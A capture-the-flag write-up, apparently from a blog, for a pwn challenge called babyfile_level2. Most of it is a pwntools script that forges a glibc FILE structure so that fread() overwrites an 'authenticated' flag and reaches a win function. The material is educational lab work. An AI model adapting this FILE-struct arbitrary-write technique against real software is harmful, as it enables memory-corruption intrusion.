
(File Struct Exploits) level 2

(File Struct Exploits) level 2

Information

  • category: pwn

Description

Harness the power of FILE structs to arbitrarily write data to bypass a security check.

Write-up

Same as the previous level, but this time the FILE struct is used for a write.

Exploit

from pwn import *

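# Load the challenge binary; assigning it to context.binary also lets pwntools
# pick up the target's architecture/OS for the helpers used below.
elf = context.binary = ELF("/challenge/babyfile_level2")
# Process handle for the spawned target.  It lives at module scope, so it is
# already visible to exploit() below; a `global p` statement at module level
# is a no-op (it only has meaning inside a function) and is not needed.
p = elf.process()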
"""
 0x0000000000401a38 <+165>:   mov    rdx,QWORD PTR [rip+0x27a9]        # 0x4041e8 <fp>
   0x0000000000401a3f <+172>:   mov    rax,QWORD PTR [rip+0x27aa]        # 0x4041f0 <buf>
   0x0000000000401a46 <+179>:   mov    rcx,rdx
   0x0000000000401a49 <+182>:   mov    edx,0x100
   0x0000000000401a4e <+187>:   mov    esi,0x1
   0x0000000000401a53 <+192>:   mov    rdi,rax
   0x0000000000401a56 <+195>:   call   0x401150 <fread@plt>
   0x0000000000401a5b <+200>:   mov    eax,DWORD PTR [rip+0x2797]        # 0x4041f8 <authenticated>
   0x0000000000401a61 <+206>:   test   eax,eax
   0x0000000000401a63 <+208>:   je     0x401a71 <challenge+222>
   0x0000000000401a65 <+210>:   mov    eax,0x0
   0x0000000000401a6a <+215>:   call   0x4012f6 <win>
   """
def exploit():
    """Send the forged FILE struct, then the bytes the target will copy through it.

    The disassembly quoted above shows the program calling fread() on the
    FILE pointer stored in ``fp`` and then branching on the global
    ``authenticated`` at 0x4041f8.  pwntools' FileStructure.read() builds
    a struct whose subsequent fread() lands on that address; the second
    send supplies the data that fread() copies there.  Uses the
    module-level process handle ``p``.
    """
    forged = FileStructure()
    struct_bytes = forged.read(0x4041f8, 260)
    filler = b"A" * 260
    for chunk in (struct_bytes, filler):
        p.send(chunk)
    p.interactive()

def main():
    """Script entry point: run the single exploit stage against the spawned process."""
    exploit()

if __name__ == '__main__':
    # Only run when executed directly, not when imported.
    main()
This post is licensed under CC BY 4.0 by the author.